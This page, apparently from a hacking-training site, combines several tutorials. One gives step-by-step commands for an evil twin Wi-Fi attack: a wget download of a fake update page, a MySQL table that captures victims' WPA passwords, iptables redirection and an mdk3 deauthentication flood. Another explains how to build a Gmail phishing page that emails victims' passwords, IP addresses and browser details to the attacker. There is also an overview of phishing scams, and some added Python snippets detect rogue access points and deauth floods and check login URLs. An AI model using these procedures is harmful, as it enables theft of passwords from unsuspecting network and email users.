How can you Create an Evil Twin Access Point?

 

Quick intro to Evil Twin:

What is an evil twin access point? In Wi-Fi security, the term evil twin access point comes up often. An attacker imitates a legitimate Wi-Fi access point in order to collect data from anyone who attempts to connect to the network.

Setting up a Wi-Fi access point with the same name and settings as another access point, and positioning it next to the impersonated one, will most likely cause the victim to fall into the trap. Since the two access points become twins, in fact identical twins, so to speak, the user will hardly be able to distinguish between them and will try to connect to the evil access point as if it were the original one. This is because the signal strengths may be similar, or at times the evil access point may even have the stronger signal.

There are two cases: either the user’s device connects automatically to an access point, which in this case is the evil access point, or the user manually chooses the stronger access point, perceiving it as the nearer one. In both cases, all the user’s sensitive data, such as passwords, will get intercepted by the attacker.
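Because the twin is indistinguishable to the user, detection has to compare what is on the air with what is supposed to be there. The following added example (not part of the original article) checks scan results against an inventory of authorized access points; the inventory, the ESSID "CorpWiFi" and all BSSIDs are constructed, hypothetical values.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    essid: str
    bssid: str
    channel: int
    encryption: str   # "WPA2", "OPEN", ...
    signal_dbm: int

# Assumed inventory of the organisation's own access points (hypothetical values).
AUTHORIZED_APS = {
    "CorpWiFi": {
        "aa:bb:cc:00:00:01": {"channel": 6, "encryption": "WPA2"},
        "aa:bb:cc:00:00:02": {"channel": 11, "encryption": "WPA2"},
    }
}

def find_suspect_aps(beacons, authorized=AUTHORIZED_APS):
    """Return (bssid, reason) for every beacon that uses a protected ESSID
    but does not match the inventory."""
    findings = []
    for b in beacons:
        inventory = authorized.get(b.essid)
        if inventory is None:
            continue                      # not one of our network names
        expected = inventory.get(b.bssid.lower())
        if expected is None:
            findings.append((b.bssid, "unknown BSSID advertising a protected ESSID"))
        elif b.encryption != expected["encryption"]:
            # A cloned BSSID still gives itself away if the security settings differ.
            findings.append((b.bssid, "encryption differs from inventory"))
        elif b.channel != expected["channel"]:
            findings.append((b.bssid, "channel differs from inventory"))
    return findings

# Constructed sample scan: two legitimate APs, one twin with a new BSSID,
# one twin that cloned a legitimate BSSID, and an unrelated network.
SAMPLE_SCAN = [
    Beacon("CorpWiFi", "aa:bb:cc:00:00:01", 6, "WPA2", -48),
    Beacon("CorpWiFi", "aa:bb:cc:00:00:02", 11, "WPA2", -61),
    Beacon("CorpWiFi", "02:11:22:33:44:55", 6, "OPEN", -30),
    Beacon("CorpWiFi", "AA:BB:CC:00:00:02", 11, "OPEN", -35),
    Beacon("CoffeeShop", "10:20:30:40:50:60", 1, "WPA2", -70),
]

if __name__ == "__main__":
    for bssid, reason in find_suspect_aps(SAMPLE_SCAN):
        print(f"{bssid}: {reason}")
```

A stronger signal from an unlisted BSSID, as in the third sample record, matches the situation described above where the twin is the "nearer" access point.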

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps work as a concise way to get an evil twin access point prepared for an attack:

  1. Get your Kali Linux machine opened and logged in
  2. Get the Internet connection established between your machine and the host machine.
  3. Get a DHCP server installed on your machine: this can be done by opening the terminal and typing: “apt-get install dhcp3-server “
  4. After the installation is done successfully, get the DHCP server configured with the following command:

“ nano/etc/dhcpd.conf”

A blank file should get opened into the terminal right away after executing this command.

  1. Inside the blank file, type the following, type the following lines as they are:

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

  1. Save the file by pressing on ctrl+x and then press ‘y’
  2. You get to set the security update page downloaded; this page is the one which will appear when the user opens the browser. To be able to accomplish this task, you should change the directory to /var/www. You can simply type the following command for this sake:

“cd /var/www”

  1. Now that you changed the work directory, you get to type the following commands in their order:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  1. Get the apache server opened now and mysql as well. The following commands respectively should do this task for you:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  1. Get a database created to be able to store the users’ WPA/WPA2 passwords when they enter the security update page. The following commands are very effective to do this task for you now:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Don’t close the MySQL page or terminal after this step.

  1. Get to know the interface name of the local network adapter and know the local IP as well. To do that, get a new separate terminal opened and type the following commands inside it:

ip route

airmon-ng

airmon-ng start wlan0

clear

when you type the first command of this list: (take note of local IP n wired interface): the interface name is the one which appears after “eth0” and the local IP appears after “src”

  1. Type the following commands now:

airodump-ng-oui-update

airodump-ng -M mon0 (take note of the target essid,bssid and channel number which all appear after this command)

airbase-ng -e [ESSID] -c [ch. #] -P mon0 (such that [ESSID] is your target’s ESSID and [ch. #] is the target’s channel no which you took note of after the previous command)

  1. Now, the evil access point is awesomely running. However, we need to get to configure our tunnel interface to be able to create a bridge between our evil twin access point and the wired interface. The name of our tunnel interface is at0. This was essentially created when we used “airbase” in the last step. To make such configurations, get a new separate terminal opened without closing neither the MySQL nor the airbase terminals. The following command should be typed into the new terminal now:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  1. A routing table has to be added now such that IP forwarding gets enabled. This way, traffic can go into and from our evil access point successfully. The following commands should be typed respectively to get this task done:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/iscdhcp-server start

  1. Perform a De-authentication attack now. This will make it compulsory for all the connected clients to connect to the evil twin access point. We need first of all to get a blacklist file created, to contain BSSID of the target. The following command will be doing this task for you:

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

  1. Get back to the airbase terminal; there you will know whether a user is connected to the evil twin access point. He will have entered his WPA/WPA2 password by then. To view this password, get back to the MySQL terminal and type the following commands:

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our MySQL database}

  1. Congratulations! You have created the evil twin access point successfully.
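From the defender's side, the de-authentication step in this procedure is the noisiest part and the easiest to detect. The following added example (not from the original article) counts deauthentication and disassociation frames per BSSID in a sliding window; the frame records, the 5-second window and the threshold of 10 are constructed assumptions standing in for what a monitor-mode sensor would log.

```python
from collections import defaultdict, deque

def detect_deauth_bursts(frames, window_ms=5000, threshold=10):
    """frames: iterable of (timestamp_ms, subtype, bssid).
    Returns {bssid: timestamp_ms at which the burst threshold was first reached}."""
    recent = defaultdict(deque)   # bssid -> timestamps of recent deauth/disassoc frames
    alerts = {}
    for ts, subtype, bssid in sorted(frames):
        if subtype not in ("deauth", "disassoc"):
            continue              # beacons, data frames etc. are ignored
        window = recent[bssid]
        window.append(ts)
        # Drop frames that have fallen out of the sliding window.
        while window and ts - window[0] > window_ms:
            window.popleft()
        if len(window) >= threshold and bssid not in alerts:
            alerts[bssid] = ts
    return alerts

# Constructed sample: a flood of 20 deauth frames against one BSSID at 100 ms
# intervals, plus ordinary traffic (a roaming client, a beacon) on the side.
SAMPLE_FRAMES = (
    [(100_000 + i * 100, "deauth", "aa:bb:cc:00:00:01") for i in range(20)]
    + [
        (100_000, "deauth", "aa:bb:cc:00:00:02"),
        (160_000, "disassoc", "aa:bb:cc:00:00:02"),
        (100_050, "beacon", "aa:bb:cc:00:00:01"),
    ]
)

if __name__ == "__main__":
    for bssid, ts in detect_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst against {bssid} at t={ts} ms")
```

Enabling 802.11w protected management frames on the access point and its clients addresses the underlying weakness, since forged deauthentication frames are then rejected.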

Try Certified Ethical Hacker for FREE!!! https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.rDbO247S.dpbs

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.  
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.    
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!

How to understand phishing scams?

 

So, what about phishing scams?

Phishing is one of the most common social engineering attacks, and it has been on the rise recently.

The following list describes a few social engineering scams carried out via phishing:

  1. Banking Link Scam:

Someone could easily send you an email to trick you into revealing vital information about yourself. An attacker may even send you a phony link that appears to lead to your bank, so that you start to believe that your real bank sent it to you. Then, you will feel tempted to enter your username and password. In 2015, a campaign named Carbanak was able to get around a billion dollars from over 30 countries. This information was found by Kaspersky. That is phishing.

Specifically, the campaign relied heavily on spear phishing. As a result, workstations were infected through the actions of their own employees. The hackers were able to tunnel deeper into the bank’s systems and take control of employee stations. This allowed them to transfer cash, operate ATMs remotely, change the information on different accounts, and tamper with the reports in other ways.

The problem at that time started with a phishing email sent to some employees that appeared to come from one of their colleagues. Behind the scenes, however, it carried malicious code, which was able to spread widely from there. In the meantime, everything that happened on the victims’ machines was recorded by the attackers for future use. When the time came, the attackers understood the whole system and knew what went where. This made it easy for them to carry out several kinds of transactions, among them the ATM hits. In addition, they inflated bank balances and then siphoned off the difference, so that a customer’s account balance might go from $20,000 to $100,000, with the $80,000 being the hacker’s earnings.

 

  1. Fax Notice Scam:

A phony link to a fake fax is all that it is. However, the resulting damage to your computer can be enormous. This type of scam appears mostly when dealing with companies that rely substantially on faxes. Firms that use faxes heavily include document management firms, title companies, and insurance and other financial services companies.

 

  1. Dropbox Link Scam:

Even Dropbox has its surprises with regard to scams. Some security incidents occurred during 2014. In one case, a phishing email was sent to victims asking them to click on a fake link to reset their Dropbox password. Clicking the link led users to a page where they faced a warning from the browser saying that their browser was out of date and needed to be updated. There was a button for users to press to run the update. However, this was the trigger for a Trojan in the Zeus family of malware. There was also another phishing attack that used Dropbox: emails containing Dropbox links were sent to victims, and clicking such links brought malicious software like the “CryptoWall” ransomware onto their systems.

 

  1. Court Secretary Complaint Link Scam:

This is another phony link that hackers use to trick a customer who falls victim to phishing. It is a link that claims to confirm a customer’s complaint. For instance, a phishing email of this sort may include a kind of prediction that a consumer is about to complain about something very soon. The sender attempts to learn what problems the customer has in order to work on them further. This kind of phishing was in fact very common for quite some time.

 

  1. Facebook Message Link Scam:

This type of phishing trick mainly appears around the time of a celebrity’s death. A link is sent through Messenger or shared through different pages, and a click on the proposed link is enough to leave the computer pushing up daisies.

One vivid example occurred when Robin Williams died. A phishing message spread widely among Facebook users, tempting them to open a link to watch the Robin Williams goodbye video. The message was carefully crafted: the title of the link was even embellished to indicate that it was an exclusive video of Williams saying goodbye through his cell phone. When users clicked the link, it took them to a bogus BBC website page that had nothing but bad links leading to scam online surveys.

How is it possible for an attacker to attract more victims to the counterfeit website?

There are in fact many methods that an attacker uses to get more victims to visit the fake website. Among them are the following four:

  1. The attacker shortens the phishing website’s URL to the minimum appropriate length.
  2. The URL is shared widely on social media websites such as WhatsApp and Viber. People there are more likely to follow these phishing links because there is no shared awareness of computer security among the users of these social groups.
  3. Many attackers rely mostly on social engineering so that people fall into the trap and open the links.
  4. Attackers send the URLs to victims by email, especially from accounts with female names.


Sources

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack

Hacking GMail Using Phishing Method and Prevention


How to Hack Gmail using Phishing Method

 

In fact, a key answer to the proposed question in this article’s title is Wapka. So what is Wapka? It is a free platform for website creation. By using it, Gmail id, browser and IP address of a victim could be all sent. Through this website, a phishing website could be created easily without any much knowledge about PHP or MySql.

 

What do I have to get before getting into the steps?

You have to be aware of the following points before starting the steps which are to be discussed later on in this article:

1. You have to have an email account to be able to register on Wapka

2. You have to be knowledgeable of HTML to some extent.

3. You have to be knowledgeable of Gmail to some extent.

4. You also should be somehow aware of website creation.

5. You have to have a victim as a target for this attack.

What are we about to do now?

We are to create a website that looks exactly like Gmail mobile website. Then, we will receive the victim’s passwords, email id, IP address and browser information, through our email id.

 

Let’s discuss the detailed steps now:

1. Open the Wapka website and get a new account registered on the site.

2. Now, get logged into your new account and navigate through the Site List to create a new one.

3. Type the name of the site, noting that all characters should be in the range of characters a to z  and numbers 0 to 9. Special characters are not allowed.

For example, you can create a username:  newgmail21 and make it @wapka.mobi

4. After clicking “submit”, this should drive you to a screen with two options: either an Admin Mode or User Mode. You should click on “Admin Mode”.

5. A blank page should now appear, which is simply your site to which you have done nothing so far. To start editing your site, click on the link:: EDIT SITE(#):: This link is at the lower rightmost corner of the screen.

6. Click on the Mail form out of all the options which appear to you now.

7. A new screen will appear. You should uncheck “Enable CAPTCHA pictures”.

Now, click “submit”. Also, remember not to set it in admin mode.

8. To make your email id as the destination where the victim’s details will be sent, you need to do the following:

A. Navigate through the site list and click with the cursor on your website name. Without choosing the Admin Mode, you need to scroll down and hit “Source code viewer.”

B. Inside the box, you should type the link to your site. There should appear a screen with some code, search for the word “value=” and take note of the number right beside it.

C. Make the mail form hidden the Admin mode. This could be simply done through the next step, but this is after getting the value=’XXXX..” code.

D. Now click on your site, then choose the Admin mode. You should have a blank site again like what happened before, and now you should also click on “Edit Site”. Afterward, click on              “Users”.

E. Click now on items visibility, and then you should select X from the drop-down menu.

F. Now, download the following code from this link:

https://www.hacking-tutorial.com/tools/subscribers/index.php?id=hckgml

G. Click on your site again and press the Admin Mode. Now, you should press Edit site and choose “WML/XHTML code”. You should now make use of the code you have just downloaded; copy paste it into this section of WML/XHTML code.

I. Remember to get the value=”XXX..” in the code replaced by the one you extracted just now.

9. Now the phishing website is ready as a design, appearance, and even functionalities. Any victim’s details should now get sent to your email which you used while registering on the Wapka website. The email will be received from [email protected] The details that will be sent should include: User-name and password With IP Address and Browser used by the victim.

10. Congratulations! You can now hack the Gmail account. Well done.

 

Where can’t I use Wapka?

There are two locations where the use of Wapka is impossible:

1. Facebook: Wapka URLs are blocked by Facebook before they can be shared. That’s because Facebook tries to protect its users as much as possible.

2. India: the government there blocked the use of this website inside the country. Even surfing the website is impossible inside India. However, they forgot how a proxy site could do all the magic as mentioned earlier no matter whether the website is blocked in a country or not.

 

How can one prevent himself/herself from getting hacked through Gmail phishing?

1. First of all, you’ve got to make sure that the URL starts with “https” in the URL bar. This ascertains that it is a Google site.

2. If a link refers to any “Free Offer, Free Lottery, Free Insurance, Free Net” etc., it is highly recommended not to click on it because it may be a phishing site. This is very common on social media websites such as WhatsApp, and even in SMS text messages.

3. Don’t click links sent to you by email just because a girl has sent them to you. This is actually one of the commonly used phishing methods to trick men and motivate them to open the link. It is one of the trickiest methods of social engineering.

4. So, in a nutshell, try not to fall for social engineering, to avoid being a victim of phishing in general and Gmail phishing in particular.
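The first check in this list can be made stricter: "https" shows only that the connection is encrypted, so the host name has to be compared as well. The following added example (not part of the original article) vets a link before a password is typed into it; the trusted-host set and every sample URL in the comments and tests are constructed assumptions.

```python
from urllib.parse import urlsplit

# Assumption: the only host the reader expects to type a Google password into.
TRUSTED_LOGIN_HOSTS = {"accounts.google.com"}

def assess_login_url(url, trusted=TRUSTED_LOGIN_HOSTS):
    """Return a list of reasons not to trust `url` as a sign-in page (empty = passes)."""
    reasons = []
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").lower().rstrip(".")
        userinfo = parts.username
    except ValueError:
        return ["URL cannot be parsed"]
    if parts.scheme != "https":
        reasons.append("not https")
    if userinfo is not None:
        # In https://accounts.google.com@login.example/ the real host is login.example.
        reasons.append("text before '@' is not the host")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label, possible look-alike name")
    if host not in trusted:
        # Exact match only: accounts.google.com.signin.example must not pass.
        reasons.append(f"host '{host}' is not an expected sign-in host")
    return reasons

if __name__ == "__main__":
    # Constructed sample links, one genuine and three deceptive.
    for link in (
        "https://accounts.google.com/signin",
        "http://accounts.google.com/signin",
        "https://accounts.google.com@login.example/signin",
        "https://accounts.google.com.signin.example/",
    ):
        print(link, "->", assess_login_url(link) or "ok")
```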


Sources

https://www.hacking-tutorial.com/hacking-tutorial/hacking-gmail-using-phishing-method-and-prevention/#sthash.4LzmArQ2.RNipUpcm.dpbs


Exploit Development webinar FREE!

In this FREE webinar Joe McCray will cover the fundamentals of exploit development and modifying public exploit code on penetration tests. Infosecaddicts designed this webinar for people with little to no exploit development or programming experience. However, people from the information security field are also welcome to join.

About Joe McCray:

Joe McCray has been teaching IT Security since 2005. While offering hands-on labs and no death by PowerPoint in his classes, he realized that in order to be a good teacher he needed a more compact and complete training program.

This webinar will be held on the 22nd of February at 1pm EST.

Click the link below to sign up for this webinar:

https://attendee.gotowebinar.com/register/5628748955745369601
